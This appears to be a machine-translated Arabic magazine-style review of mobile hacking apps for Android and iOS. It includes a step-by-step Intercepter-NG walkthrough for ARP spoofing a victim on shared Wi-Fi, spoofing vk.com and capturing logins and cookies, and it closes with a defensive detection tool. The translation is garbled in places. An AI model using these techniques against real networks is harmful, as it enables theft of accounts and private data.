نحن نعترض كلمات المرور وملفات تعريف الارتباط. التجربة: كيفية سرقة البيانات الشخصية باستخدام شبكة Wi-Fi المجانية كيفية اعتراض البيانات عبر wifi Android

💖 هل يعجبك؟شارك الرابط مع أصدقائك

"هاتف ذكي مزود بأدوات القرصنة؟ "لا يوجد شيء من هذا القبيل"، كنا قد أخبرناك مؤخرًا. كان من الممكن إطلاق بعض الأدوات المعتادة لتنفيذ الهجمات على بعض Maemo فقط. الآن، تم نقل العديد من الأدوات المألوفة إلى نظامي التشغيل iOS وAndroid، وتمت كتابة بعض أدوات الاختراق خصيصًا لبيئة الهاتف المحمول. هل يمكن للهاتف الذكي أن يحل محل الكمبيوتر المحمول في اختبارات الاختراق؟ قررنا أن التحقق من ذلك.

ذكري المظهر

يعد Android نظامًا أساسيًا شائعًا ليس فقط للبشر العاديين، ولكن أيضًا للأشخاص المناسبين. عدد الأدوات المساعدة [-] المفيدة هنا هو ببساطة خارج المخططات. لهذا يمكننا أن نشكر جذور نظام UNIX - فقد أدى ذلك إلى تبسيط عملية نقل العديد من الأدوات إلى Android بشكل كبير. ولسوء الحظ، لا تسمح Google بدخول بعضها إلى متجر Play، لذا سيتعين عليك تثبيت ملف APK المطابق يدويًا. أيضًا، تتطلب بعض الأدوات المساعدة أقصى قدر من الوصول إلى النظام (على سبيل المثال، جدار الحماية iptables)، لذلك يجب عليك الاهتمام بالوصول إلى الجذر مسبقًا. يستخدم كل مصنع التكنولوجيا الخاصة به هنا، ولكن العثور على التعليمات اللازمة أمر سهل للغاية. تم تجميع مجموعة جيدة من HOWTOs معًا بواسطة مورد LifeHacker (bit.ly/eWgDlu). ومع ذلك، إذا لم تتمكن من العثور على نموذج هنا، فإن منتدى XDA-Developers (www.xda-developers.com) يأتي دائمًا للإنقاذ، حيث يمكنك العثور على معلومات متنوعة حول أي طراز من هواتف Android تقريبًا. بطريقة أو بأخرى، ستعمل بعض الأدوات المساعدة الموضحة أدناه دون الوصول إلى الجذر.

لنبدأ المراجعة مع مدير حزم غير عادي. يطلق عليها المطورون اسم "الأدوات المساعدة للمستخدمين المتميزين"، وهذا ليس بعيدًا عن الحقيقة. بعد تثبيت BotBrew، تحصل على مستودع يمكنك من خلاله تنزيل عدد كبير من الأدوات المألوفة المجمعة لنظام Android. من بينها: مترجمو Python وRuby لتشغيل العديد من الأدوات المكتوبة فيها، وtcpdump sniffer وماسح ضوئي Nmap لتحليل الشبكة، وGit وSubversion للعمل مع أنظمة التحكم في الإصدار، وغير ذلك الكثير.

الماسحات الضوئية للشبكة

يمكن أن يكون الهاتف الذكي غير الواضح، والذي، على عكس الكمبيوتر المحمول، يمكن وضعه بسهولة في الجيب ولا يثير الشكوك أبدًا، مفيدًا لاستكشاف الشبكة. لقد قلنا بالفعل أعلاه كيف يمكنك تثبيت Nmap، ولكن هناك خيار آخر. PIPS عبارة عن منفذ من الماسح الضوئي Nmap تم تكييفه خصيصًا لنظام Android، على الرغم من أنه منفذ غير رسمي. هذا يعني أنه يمكنك العثور بسرعة على الأجهزة النشطة على الشبكة، وتحديد نظام التشغيل الخاص بها باستخدام خيارات البصمات، وإجراء فحص للمنافذ - باختصار، القيام بكل ما يستطيع Nmap القيام به.

هناك مشكلتان في استخدام Nmap، على الرغم من كل قوته. أولاً، يتم نقل معلمات المسح من خلال مفاتيح التشغيل، والتي لا يجب أن تعرفها فحسب، بل يمكنك أيضًا إدخالها باستخدام لوحة مفاتيح محمولة غير ملائمة. وثانيا، نتائج المسح في إخراج وحدة التحكم ليست واضحة كما نود. لا يحتوي الماسح الضوئي Fing على هذه العيوب، فهو يقوم بمسح الشبكة بسرعة كبيرة، ويقوم بأخذ بصمات الأصابع، ثم يعرض بشكل واضح قائمة بجميع الأجهزة المتاحة، ويقسمها حسب النوع (جهاز التوجيه، وسطح المكتب، وiPhone، وما إلى ذلك). وفي الوقت نفسه، يمكنك عرض قائمة المنافذ المفتوحة بسرعة لكل مضيف. علاوة على ذلك، من هنا يمكنك الاتصال، على سبيل المثال، بـ FTP، باستخدام عميل FTP المثبت في النظام - وهو أمر مريح للغاية.

عندما يتعلق الأمر بتحليل مضيف معين، يمكن أن تكون أداة NetAudit المساعدة لا غنى عنها. إنه يعمل على أي جهاز يعمل بنظام Android (حتى بدون الجذر) ويسمح لك ليس فقط بالتعرف بسرعة على الأجهزة الموجودة على الشبكة، ولكن أيضًا بفحصها باستخدام قاعدة بيانات كبيرة لبصمات الأصابع لتحديد نظام التشغيل، بالإضافة إلى أنظمة CMS المستخدمة على الويب الخادم. يوجد الآن أكثر من 3000 بصمة رقمية في قاعدة البيانات.

على العكس من ذلك، إذا كنت بحاجة إلى العمل على مستوى أدنى وفحص تشغيل الشبكة بعناية، فلا يمكنك الاستغناء عن أدوات Net Tools. هذه مجموعة لا غنى عنها من الأدوات المساعدة لعمل مسؤول النظام، والتي تتيح لك تشخيص تشغيل الشبكة التي يتصل بها الجهاز بشكل كامل. تحتوي الحزمة على أكثر من 15 نوعًا مختلفًا من البرامج، مثل ping وtraceroute وarp وdns وnetstat وroute.

التلاعب بحركة المرور

يقوم برنامج الشم القائم على tcpdump بتسجيل جميع البيانات بأمانة في ملف pcap، والذي يمكن بعد ذلك دراسته باستخدام أدوات مساعدة مألوفة مثل Wireshark أو Network Miner. نظرًا لعدم تنفيذ أي إمكانات لهجمات MITM، فهي بالأحرى أداة لتحليل حركة المرور الخاصة بك. على سبيل المثال، هذه طريقة رائعة لدراسة البرامج المثبتة على جهازك من المستودعات المشكوك فيها.

إذا تحدثنا عن التطبيقات القتالية لنظام Android، فإن أحد أكثر التطبيقات إثارة هو FaceNiff، الذي ينفذ الاعتراض والحقن في جلسات الويب التي تم اعتراضها. من خلال تنزيل حزمة APK مع البرنامج، يمكنك تشغيل أداة الاختراق هذه على أي هاتف ذكي يعمل بنظام Android تقريبًا، ومن خلال الاتصال بشبكة لاسلكية، يمكنك اعتراض حسابات مجموعة متنوعة من الخدمات: Facebook، وTwitter، وVKontakte، وما إلى ذلك - أكثر من عشرة في المجموع. يتم تنفيذ اختطاف الجلسة باستخدام هجوم انتحال ARP، ولكن الهجوم ممكن فقط على الاتصالات غير المحمية (FaceNiff غير قادر على التدخل في حركة مرور SSL). للحد من تدفق scriptdis، حدد المؤلف الحد الأقصى لعدد الجلسات بثلاث جلسات - ثم تحتاج إلى الاتصال بالمطور للحصول على رمز تفعيل خاص.

إذا كان منشئ FaceNiff يريد المال مقابل استخدامه، فإن DroidSheep هي أداة مجانية تمامًا بنفس الوظيفة. صحيح أنك لن تجد مجموعة التوزيع على الموقع الرسمي (وهذا بسبب قوانين ألمانيا الصارمة فيما يتعلق بالمرافق الأمنية)، ولكن يمكن العثور عليها على الإنترنت دون أي مشاكل. تتمثل المهمة الرئيسية للأداة في اعتراض جلسات الويب الخاصة بالمستخدم على الشبكات الاجتماعية الشهيرة، والتي يتم تنفيذها باستخدام نفس ARP Spoofing. ولكن هناك مشكلة في الاتصالات الآمنة: مثل FaceNiff، يرفض DroidSheep رفضًا قاطعًا العمل مع بروتوكول HTTPS.

توضح هذه الأداة أيضًا عدم أمان الشبكات اللاسلكية المفتوحة، ولكن على مستوى مختلف قليلاً. إنه لا يعترض جلسات المستخدم، ولكنه يسمح لحركة مرور HTTP بالمرور عبر نفسه باستخدام هجوم انتحال، وإجراء عمليات معالجة محددة معه. بدءًا من المقالب العادية (استبدال جميع الصور الموجودة على الموقع بوجوه المتصيدين، أو قلب جميع الصور، أو، على سبيل المثال، استبدال نتائج Google) وانتهاءً بهجمات التصيد الاحتيالي، عندما يُعطى المستخدم صفحات مزيفة من خدمات شائعة مثل facebook.com، وlinkedin .com وvkontakte.ru وغيرها الكثير.

إذا سألت أي أداة اختراق لنظام Android هي الأقوى، فمن المحتمل ألا يكون لدى Anti أي منافسين. هذا هو الجمع بين القراصنة الحقيقي. المهمة الرئيسية للبرنامج هي مسح محيط الشبكة. بعد ذلك، تدخل وحدات مختلفة في المعركة، والتي يتم من خلالها تنفيذ ترسانة كاملة من الأسلحة: التنصت على حركة المرور، وتنفيذ هجمات MITM، واستغلال نقاط الضعف الموجودة. صحيح أن هناك أيضًا عيوب. أول ما يلفت انتباهك هو أن استغلال الثغرات الأمنية يتم فقط من خادم البرنامج المركزي الموجود على الإنترنت، ونتيجة لذلك يمكن نسيان الأهداف التي ليس لها عنوان IP خارجي.

أنفاق المرور

مدير الملفات الشهير متوفر الآن على الهواتف الذكية! كما هو الحال في إصدار سطح المكتب، يوجد نظام من المكونات الإضافية للاتصال بأدلة الشبكة المختلفة، بالإضافة إلى وضع ثنائي اللوحة - مناسب بشكل خاص على الأجهزة اللوحية.

حسنًا، ولكن كيف يمكنك ضمان أمان بياناتك المنقولة عبر شبكة لاسلكية مفتوحة؟ بالإضافة إلى شبكة VPN، التي يدعمها Android بشكل تلقائي، يمكنك إنشاء نفق SSH. لهذا الغرض، هناك أداة مساعدة رائعة لـ SSH Tunnel، والتي تتيح لك توجيه حركة مرور التطبيقات المحددة أو النظام بأكمله من خلال خادم SSH بعيد.

غالبًا ما يكون من الضروري إرسال حركة المرور عبر وكيل أو SOX، وفي هذه الحالة سيساعدك ProxyDroid. الأمر بسيط: يمكنك اختيار حركة مرور التطبيق التي تريد توجيهها إلى النفق، وتحديد الوكيل (يدعم HTTP/HTTPS/SOCKS4/SOCKS5). إذا كان الترخيص مطلوبًا، فإن ProxyDroid يدعم هذا أيضًا. بالمناسبة، يمكن ربط التكوين بشبكة لاسلكية محددة عن طريق ضبط إعدادات مختلفة لكل منها.

شبكة لاسلكية

مدير الشبكة اللاسلكية المدمج ليس مفيدًا للغاية. إذا كنت تريد الحصول بسرعة على صورة كاملة لنقاط الوصول القريبة، فإن الأداة المساعدة Wifi Analyzer هي خيار ممتاز. لن يعرض جميع نقاط الوصول القريبة فحسب، بل سيعرض أيضًا القناة التي تعمل عليها وعنوان MAC الخاص بها، والأهم من ذلك، نوع التشفير المستخدم (بعد رؤية الحروف المرغوبة "WEP"، يمكننا أن نفترض أن الوصول إلى يتم توفير الشبكة الآمنة). بالإضافة إلى ذلك، تعد الأداة المساعدة مثالية إذا كنت بحاجة إلى العثور على مكان وجود نقطة الوصول المطلوبة فعليًا، وذلك بفضل مؤشر قوة الإشارة المرئية.

يمكن أن تكون هذه الأداة المساعدة، كما يقول مطورها، مفيدة عندما تكون الشبكة اللاسلكية ممتلئة بالسعة مع العملاء الذين يستخدمون القناة بأكملها، وفي هذه اللحظة هناك حاجة إلى اتصال جيد واتصال مستقر. يتيح لك WiFiKill فصل العملاء عن الإنترنت إما بشكل انتقائي أو بناءً على معيار محدد (على سبيل المثال، من الممكن السخرية من جميع أعضاء Yabloko). يقوم البرنامج ببساطة بتنفيذ هجوم انتحال ARP ويعيد توجيه جميع العملاء إلى أنفسهم. يتم تنفيذ هذه الخوارزمية بغباء ببساطة على أساس iptables. هذه هي لوحة التحكم للشبكات اللاسلكية للوجبات السريعة :).

تدقيق تطبيقات الويب

تعد معالجة طلبات HTTP من جهاز كمبيوتر أمرًا سهلاً للغاية، فهناك عدد كبير من الأدوات المساعدة والمكونات الإضافية للمتصفح لهذا الغرض. في حالة الهاتف الذكي، كل شيء أكثر تعقيدا قليلا. سيساعدك HTTP Query Builder على إرسال طلب HTTP مخصص مع المعلمات التي تحتاجها، على سبيل المثال، ملف تعريف الارتباط المطلوب أو وكيل مستخدم تم تغييره. سيتم عرض نتيجة الطلب في متصفح قياسي.

إذا كان الموقع محميًا بكلمة مرور باستخدام مصادقة الوصول الأساسية، فيمكنك التحقق من موثوقيته باستخدام الأداة المساعدة Router Brute Force ADS 2. في البداية، تم إنشاء الأداة المساعدة لفرض كلمات المرور على لوحة إدارة جهاز التوجيه، ولكن من الواضح أنه يمكن تستخدم ضد أي مورد آخر يتمتع بحماية مماثلة. تعمل الأداة المساعدة، ولكن من الواضح أنها خام. على سبيل المثال، لا يوفر المطور القوة الغاشمة، بل القوة الغاشمة فقط باستخدام القاموس.

من المؤكد أنك سمعت عن هذا البرنامج المثير لتعطيل خوادم الويب مثل Slowloris. مبدأ عمله هو إنشاء أكبر عدد ممكن من الاتصالات مع خادم ويب بعيد والاحتفاظ به، وبالتالي منع العملاء الجدد من الاتصال به. لذلك، AnDOSid هو نظير لـ Slowloris مباشرة في جهاز Android الخاص بك! سأخبرك بسر، مائتي اتصال كافية لضمان التشغيل غير المستقر لكل موقع ويب رابع يقوم بتشغيل خادم الويب Apache. وكل هذا - من هاتفك!

المرافق المختلفة

عند العمل مع العديد من تطبيقات الويب وتحليل منطقها، من الشائع جدًا مواجهة البيانات المنقولة في شكل مشفر، وهي Base64. سيساعدك Encode على فك تشفير هذه البيانات ومعرفة ما تم تخزينه فيها بالضبط. ربما، عن طريق استبدال علامات الاقتباس، وترميزها مرة أخرى في Base64 واستبدالها في عنوان URL الخاص بالموقع الذي تبحث عنه، سوف تحصل على خطأ استعلام قاعدة البيانات المرغوب فيه.

إذا كنت بحاجة إلى محرر سداسي عشري، فهناك محرر لنظام Android أيضًا. باستخدام HexEditor يمكنك تحرير أي ملفات، بما في ذلك ملفات النظام، إذا قمت برفع حقوق البرنامج إلى المستخدم المتميز. بديل ممتاز لمحرر النصوص القياسي، مما يتيح لك العثور بسهولة على الجزء المطلوب من النص وتغييره.

الوصول عن بعد

بمجرد أن تتمكن من الوصول إلى مضيف بعيد، يجب أن تكون قادرًا على استخدامه. ولهذا نحن بحاجة إلى عملاء. لنبدأ بـ SSH، حيث يعد ConnectBot هو المعيار الفعلي بالفعل. بالإضافة إلى الواجهة المريحة، فهو يوفر القدرة على تنظيم أنفاق آمنة عبر اتصالات SSH.

برنامج مفيد يسمح لك بالاتصال بسطح مكتب بعيد عبر خدمات RDP أو VNC. أنا سعيد للغاية لأن هذين العميلين في عميل واحد؛ ليست هناك حاجة لاستخدام أدوات مختلفة لـ RDP وVNC.

متصفح MIB مصمم خصيصًا لنظام Android، والذي يمكنك من خلاله إدارة أجهزة الشبكة باستخدام بروتوكول SNMP. يمكن أن يكون مفيدًا لتطوير ناقل هجوم على أجهزة توجيه مختلفة، نظرًا لأن سلسلة المجتمع القياسية (بمعنى آخر، كلمة مرور الوصول) للإدارة عبر SNMP لم يتم إلغاؤها بعد.

دائرة الرقابة الداخلية

لا تقل شعبية نظام iOS بين مطوري الأدوات الأمنية. ولكن إذا كانت حقوق الجذر في حالة Android مطلوبة فقط لبعض التطبيقات، فإن كسر الحماية مطلوب دائمًا على أجهزة Apple. لحسن الحظ، حتى بالنسبة لأحدث البرامج الثابتة لـ iDevices (5.1.1) توجد بالفعل أداة لكسر الحماية. إلى جانب الوصول الكامل، يمكنك أيضًا الحصول على مدير تطبيقات بديل، Cydia، والذي يحتوي بالفعل على العديد من الأدوات المساعدة.

العمل مع النظام

أول شيء أريد أن أبدأ به هو تثبيت المحطة. لأسباب واضحة، لم يتم تضمينه في التسليم القياسي لنظام التشغيل المحمول، ولكننا سنحتاج إليه لتشغيل الأدوات المساعدة لوحدة التحكم، والتي سنناقشها بمزيد من التفصيل. أفضل تطبيق لمحاكي المحطة الطرفية هو MobileTerminal - فهو يدعم محطات متعددة وإيماءات التحكم (على سبيل المثال، لإرسال Control-C) وهو مثير للإعجاب بشكل عام في تفكيره.

هناك خيار آخر أكثر تعقيدًا للوصول إلى وحدة التحكم بالجهاز وهو تثبيت OpenSSH عليه (يتم ذلك من خلال Cydia) والاتصال به محليًا من خلال عميل SSH. إذا كنت تستخدم العميل المناسب مثل iSSH، الذي يتمتع بتحكم مذهل في شاشة اللمس، فإن هذه الطريقة أكثر ملاءمة من استخدام MobileTerminal.

اعتراض البيانات

الآن بعد أن أصبح لديك حق الوصول إلى وحدة التحكم، يمكنك تجربة الأدوات المساعدة. لنبدأ مع Pirni، الذي دخل التاريخ باعتباره أداة شم كاملة لنظام iOS. لسوء الحظ، لا يمكن تحويل وحدة Wi-Fi المحدودة هيكليًا والمضمنة في الجهاز إلى الوضع المختلط الضروري لاعتراض البيانات العادي. لذلك لاعتراض البيانات، يتم استخدام خداع ARP الكلاسيكي، والذي يتم من خلاله تمرير كل حركة المرور عبر الجهاز نفسه. يتم إطلاق الإصدار القياسي من الأداة المساعدة من وحدة التحكم، حيث يتم تحديد اسم ملف PCAP، بالإضافة إلى معلمات هجوم MITM، الذي يتم تسجيل كل حركة المرور فيه. تحتوي الأداة المساعدة على إصدار أكثر تقدمًا - Pirni Pro، الذي يتميز بواجهة رسومية. علاوة على ذلك، يمكنه تحليل حركة مرور HTTP بسرعة وحتى استخراج البيانات المثيرة للاهتمام منها تلقائيًا (على سبيل المثال، تسجيلات الدخول وكلمات المرور)، باستخدام التعبيرات العادية المحددة في الإعدادات.

لقد أصبح لدى Intercepter-NG المشهور، والذي كتبنا عنه عدة مرات، مؤخرًا إصدار وحدة تحكم. كما يقول المؤلف، فإن معظم التعليمات البرمجية مكتوبة بلغة ANSI C الخالصة، والتي تتصرف بنفس الطريقة في أي بيئة تقريبًا، لذلك عمل إصدار وحدة التحكم منذ البداية على كل من أجهزة سطح المكتب Windows وLinux وBSD، وعلى منصات الأجهزة المحمولة، بما في ذلك iOS وأندرويد. يقوم إصدار وحدة التحكم بالفعل بتنفيذ التقاط كلمات المرور المنقولة عبر مجموعة متنوعة من البروتوكولات، واعتراض رسائل المراسلة الفورية (ICQ/Jabber وغيرها الكثير)، بالإضافة إلى استعادة الملفات من حركة المرور (HTTP/FTP/IMAP/POP3/SMTP/SMB). وفي الوقت نفسه، تتوفر وظائف مسح الشبكة وسم ARP عالي الجودة. للتشغيل الصحيح، يجب عليك أولاً تثبيت حزمة libpcap عبر Cydia (لا تنس تمكين حزم التطوير في الإعدادات). تتلخص جميع تعليمات بدء التشغيل في تحديد الحقوق الصحيحة: chmod +x Interter_ios. بعد ذلك، إذا قمت بتشغيل أداة الشم بدون معلمات، فستظهر واجهة Itercepter تفاعلية واضحة، مما يسمح لك بشن أي هجمات.

من الصعب تصديق ذلك، ولكن هذه الأداة المتطورة لتنفيذ هجمات MITM تم نقلها أخيرًا إلى نظام التشغيل iOS. وبعد قدر هائل من العمل، تمكنا من إنشاء منفذ متنقل متكامل. لإنقاذ نفسك من الرقص مع الدف حول التبعيات أثناء التجميع الذاتي، من الأفضل تثبيت حزمة تم إنشاؤها بالفعل باستخدام Cydia، بعد إضافة theworm.altervista.org/cydia (مستودع TWRepo) كمصدر للبيانات. تشتمل المجموعة أيضًا على الأداة المساعدة etterlog، التي تساعد في استخراج أنواع مختلفة من المعلومات المفيدة من تفريغ حركة المرور المجمعة (على سبيل المثال، حسابات الوصول إلى FTP).

تحليل الشبكات اللاسلكية

في الإصدارات الأقدم من نظام التشغيل iOS، قام الحرفيون بتشغيل برنامج aircrack ويمكنهم كسر مفتاح WEP، لكننا تحققنا: البرنامج لا يعمل على الأجهزة الجديدة. لذلك، لدراسة Wi-Fi، سيتعين علينا أن نكون راضين عن الماسحات الضوئية Wi-Fi فقط. يقوم WiFi Analyzer بتحليل وعرض المعلومات حول جميع شبكات 802.11 المتاحة من حولك، بما في ذلك معلومات حول SSID والقنوات والبائعين وعناوين MAC وأنواع التشفير. تقوم الأداة بإنشاء رسوم بيانية مرئية في الوقت الفعلي بناءً على البيانات الموجودة على الهواء. باستخدام مثل هذا البرنامج، من السهل العثور على الموقع الفعلي للنقطة إذا نسيتها فجأة، وعلى سبيل المثال، انظر إلى رمز WPS PIN، الذي قد يكون مفيدًا للاتصال.

الماسحات الضوئية للشبكة

ما هو البرنامج الذي يستخدمه أي مختبر اختراق في أي مكان في العالم، بغض النظر عن الأهداف والغايات؟ ماسح الشبكة. وفي حالة نظام التشغيل iOS، من المرجح أن تكون هذه أقوى مجموعة أدوات Scany. بفضل مجموعة الأدوات المساعدة المضمنة، يمكنك الحصول بسرعة على صورة مفصلة لأجهزة الشبكة، على سبيل المثال، المنافذ المفتوحة. بالإضافة إلى ذلك، تتضمن الحزمة أدوات مساعدة لاختبار الشبكة مثل ping وtraceroute وnslookup.

ومع ذلك، كثير من الناس يفضلون فنغ. يحتوي الماسح الضوئي على وظائف بسيطة ومحدودة للغاية، لكنه يكفي تماما للتعارف الأول مع شبكة الكافتيريا، على سبيل المثال :). تعرض النتائج معلومات حول الخدمات المتاحة على الأجهزة البعيدة وعناوين MAC وأسماء المضيفين المتصلة بالشبكة التي تم فحصها.

يبدو أن الجميع قد نسي نيكتو، ولكن لماذا؟ بعد كل شيء، يمكنك بسهولة تثبيت أداة فحص ثغرات الويب هذه، المكتوبة بلغة نصية (تحديدًا Perl)، عبر Cydia. هذا يعني أنه يمكنك تشغيله بسهولة على جهازك الذي تمت كسر الحماية فيه من الجهاز. سيكون من دواعي سرور Nikto تزويدك بمعلومات إضافية حول مورد الويب الذي تم اختباره. بالإضافة إلى ذلك، يمكنك إضافة توقيعات البحث الخاصة بك إلى قاعدة بيانات المعرفة الخاصة بك بيديك.

هذه الأداة القوية لاستغلال ثغرات SQL تلقائيًا مكتوبة بلغة Python، مما يعني أنه بمجرد تثبيت المترجم، يمكنك استخدامه بسهولة مباشرة من جهازك المحمول.

جهاز التحكم

تتم إدارة العديد من أجهزة الشبكة (بما في ذلك أجهزة التوجيه باهظة الثمن) باستخدام بروتوكول SNMP. تتيح لك هذه الأداة المساعدة فحص الشبكات الفرعية بحثًا عن خدمات SNMP المتاحة بقيم سلسلة المجتمع المعروفة مسبقًا (بمعنى آخر، كلمات المرور القياسية). لاحظ أن البحث عن خدمات SNMP باستخدام سلاسل مجتمعية قياسية (عامة/خاصة) في محاولة للوصول إلى إدارة الجهاز يعد جزءًا لا يتجزأ من أي اختبار اختراق، إلى جانب تحديد المحيط نفسه وتحديد الخدمات.

تم تصميم أداتين مساعدة من نفس الشركة المصنعة للاتصال بسطح مكتب بعيد باستخدام بروتوكولي RDP وVNC. هناك العديد من الأدوات المساعدة المشابهة في متجر التطبيقات، ولكن هذه هي الأدوات سهلة الاستخدام بشكل خاص.

استعادة كلمة السر

تم نقل البرنامج الأسطوري الذي يساعد الملايين من المتسللين حول العالم على "تذكر" كلمة المرور الخاصة بهم إلى نظام التشغيل iOS. يمكنك الآن البحث عن كلمات مرور لخدمات مثل HTTP، وFTP، وTELNET، وSSH، وSMB، وVNC، وSMTP، وPOP3 وغيرها الكثير مباشرة من جهاز iPhone الخاص بك. صحيح، لهجوم أكثر فعالية، من الأفضل تخزين قواميس القوة الغاشمة الجيدة.

يعلم الجميع بشكل مباشر مدى ضعف استخدام كلمات المرور القياسية. Pass Mule هو نوع من الدليل يحتوي على جميع أنواع تسجيلات الدخول وكلمات المرور القياسية لأجهزة الشبكة. يتم تنظيمها بشكل ملائم حسب اسم البائع والمنتج والطراز، لذا فإن العثور على المنتج الذي تحتاجه لن يكون صعبًا. تم تصميم البرنامج بدلاً من ذلك لتوفير الوقت في البحث عن دليل لجهاز التوجيه وتسجيل الدخول القياسي وكلمة المرور التي تحتاج إلى معرفتها.

استغلال نقاط الضعف

من الصعب أن نتخيل أداة قرصنة أكثر من Metasploit، وهذا ما نختتم مراجعتنا اليوم. Metasploit عبارة عن حزمة من الأدوات المتنوعة التي تتمثل مهمتها الرئيسية في استغلال نقاط الضعف في البرامج. تخيل: حوالي 1000 مآثر موثوقة ومثبتة وضرورية في الحياة اليومية للكاتب - مباشرة على هاتفك الذكي! بمساعدة هذه الأداة، يمكنك حقًا إثبات وجودك في أي شبكة. لا يسمح لك Metasploit باستغلال العيوب في تطبيقات الخادم فحسب، بل تتوفر أيضًا أدوات لمهاجمة تطبيقات العميل (على سبيل المثال، من خلال وحدة Browser Autopwn، عندما يتم إدراج حمولة قتالية في حركة مرور العميل). هنا يجب القول أنه لا يوجد إصدار محمول لمجموعة الأدوات، ومع ذلك، يمكنك تثبيت حزمة قياسية على جهاز Apple باستخدام .

المعترضهي أداة شبكة متعددة الوظائف تتيح لك الحصول على البيانات من حركة المرور (كلمات المرور، ورسائل المراسلة الفورية، والمراسلات، وما إلى ذلك) وتنفيذ هجمات MiTM المختلفة.

واجهة برنامج اعتراضية
الوظيفة الرئيسية

  • اعتراض رسائل المراسلة الفورية.
  • اعتراض ملفات تعريف الارتباط وكلمات المرور.
  • اعتراض النشاط (الصفحات والملفات والبيانات).
  • القدرة على انتحال تنزيلات الملفات عن طريق إضافة ملفات ضارة. يمكن استخدامها جنبا إلى جنب مع المرافق الأخرى.
  • استبدال شهادات Https بـ Http.
أوضاع التشغيل
وضع الرسل– يسمح لك بالتحقق من المراسلات التي تم إرسالها بشكل غير مشفر. تم استخدامه لاعتراض الرسائل في برامج المراسلة الفورية مثل رسائل ICQ وAIM وJABBER.

وضع القيامة- استعادة البيانات المفيدة من حركة المرور، من البروتوكولات التي تنقل حركة المرور بنص واضح. عندما يشاهد الضحية الملفات والصفحات والبيانات، يمكن اعتراضها جزئيًا أو كليًا. بالإضافة إلى ذلك، يمكنك تحديد حجم الملفات حتى لا يتم تنزيل البرنامج بأجزاء صغيرة. يمكن استخدام هذه المعلومات للتحليل.

وضع كلمة المرور- وضع العمل مع ملفات تعريف الارتباط. وبهذه الطريقة، من الممكن الوصول إلى الملفات التي زارها الضحية.

وضع المسح- الوضع الرئيسي للاختبار. لبدء المسح، تحتاج إلى النقر بزر الماوس الأيمن فوق Smart Scan. بعد المسح، ستعرض النافذة جميع المشاركين في الشبكة ونظام التشغيل الخاص بهم والمعلمات الأخرى.

بالإضافة إلى ذلك، في هذا الوضع يمكنك فحص المنافذ. يجب عليك استخدام وظيفة فحص المنافذ. بالطبع، هناك أدوات مساعدة وظيفية أكثر بكثير لهذا، ولكن وجود هذه الوظيفة هو نقطة مهمة.

إذا كنا مهتمين بهجوم مستهدف على الشبكة، فبعد المسح نحتاج إلى إضافة عنوان IP المستهدف إلى Nat باستخدام الأمر (Add to Nat). في نافذة أخرى سيكون من الممكن تنفيذ هجمات أخرى.

وضع نات.الوضع الرئيسي، والذي يسمح لك بتنفيذ عدد من الهجمات عبر ARP. هذه هي النافذة الرئيسية التي تسمح بالهجمات المستهدفة.

وضع DHCP.هذا هو الوضع الذي يسمح لك برفع خادم DHCP الخاص بك لتنفيذ هجمات DHCP في المنتصف.

بعض أنواع الهجمات التي يمكن تنفيذها
انتحال الموقع

لتزييف موقع الضحية، عليك الذهاب إلى Target، وبعد ذلك تحتاج إلى تحديد الموقع واستبداله. بهذه الطريقة يمكنك استبدال الكثير من المواقع. كل هذا يتوقف على مدى جودة المنتجات المزيفة.

انتحال الموقع

مثال لموقع VK.com

اختيار هجوم MiTM

تغيير قاعدة الحقن
ونتيجة لذلك، يفتح الضحية موقع ويب مزيفًا عند طلب vk.com. وفي وضع كلمة المرور، يجب أن يكون هناك تسجيل دخول وكلمة مرور للضحية:

لتنفيذ هجوم مستهدف، تحتاج إلى تحديد ضحية من القائمة وإضافتها إلى الهدف. ويمكن القيام بذلك باستخدام زر الفأرة الأيمن.

إضافة هجمات MiTm
يمكنك الآن استخدام وضع Ressurection لاستعادة البيانات المختلفة من حركة المرور.

ملفات ومعلومات الضحية عبر هجوم MiTm
انتحال حركة المرور

تحديد الإعدادات
وبعد ذلك يتغير طلب الضحية من "الثقة" إلى "الخاسر".

بالإضافة إلى ذلك، يمكنك إيقاف ملفات تعريف الارتباط حتى يتمكن الضحية من تسجيل الخروج من جميع الحسابات وتسجيل الدخول مرة أخرى. سيسمح لك هذا باعتراض عمليات تسجيل الدخول وكلمات المرور.

تدمير ملفات تعريف الارتباط

كيف ترى المتشمم المحتمل على الشبكة باستخدام Intercepter؟

باستخدام خيار Promisc Detection، يمكنك اكتشاف جهاز يقوم بالمسح على الشبكة المحلية. بعد المسح، سيظهر عمود الحالة "Sniffer". هذه هي الطريقة الأولى لاكتشاف المسح على الشبكة المحلية.

كشف الشم
جهاز SDR HackRF


HackRF
حقوق السحب الخاصة (SDR) هي نوع من أجهزة استقبال الراديو التي تسمح لك بالعمل مع معلمات تردد الراديو المختلفة. وبالتالي، من الممكن اعتراض إشارة Wi-Fi وGSM وLTE وما إلى ذلك.

HackRF هو جهاز SDR كامل بسعر 300 دولار. ويعمل مؤلف المشروع مايكل عثمان على تطوير أجهزة ناجحة في هذا الاتجاه. تم تطوير جهاز Ubertooth Bluetooth sniffer مسبقًا وتنفيذه بنجاح. HackRF هو مشروع ناجح جمع أكثر من 600 ألف دولار على Kickstarter. وقد تم بالفعل بيع 500 من هذه الأجهزة للاختبار التجريبي.

يعمل HackRF في نطاق الترددات من 30 ميجا هرتز إلى 6 جيجا هرتز. تردد أخذ العينات هو 20 ميجا هرتز، والذي يسمح لك باعتراض الإشارات من شبكات Wi-FI وLTE.

كيف تحمي نفسك على المستوى المحلي؟

أولاً، دعونا نستخدم برنامج SoftPerfect WiFi Guard. هناك نسخة محمولة لا تأخذ أكثر من 4 ميغابايت. يسمح لك بفحص شبكتك وعرض الأجهزة المعروضة عليها. يحتوي على إعدادات تسمح لك بتحديد بطاقة الشبكة والحد الأقصى لعدد الأجهزة التي سيتم فحصها. بالإضافة إلى ذلك، يمكنك ضبط الفاصل الزمني للمسح.


واجهة برنامج SoftPerfect WiFi Guard
بعد المسح، يرسل البرنامج إشعارات بعدد الأجهزة غير المعروفة الموجودة. يتيح لنا ذلك إضافة المستخدمين الموثوقين ووضع علامة عليهم وملاحظة ما إذا كان شخص ما قد اتصل وبدأ في الاستماع إلى حركة المرور. سيتم إرسال الإخطارات بعد كل فترة المسح. يتيح لك هذا تعطيل محتال محدد على جهاز التوجيه في حالة وجود أنشطة مشبوهة.


إعدادات برنامج SoftPerfect WiFi Guard


القدرة على إضافة تعليقات للمستخدمين


نافذة إعلام للأجهزة غير المألوفة بعد كل فترة مسح محددة

خاتمة
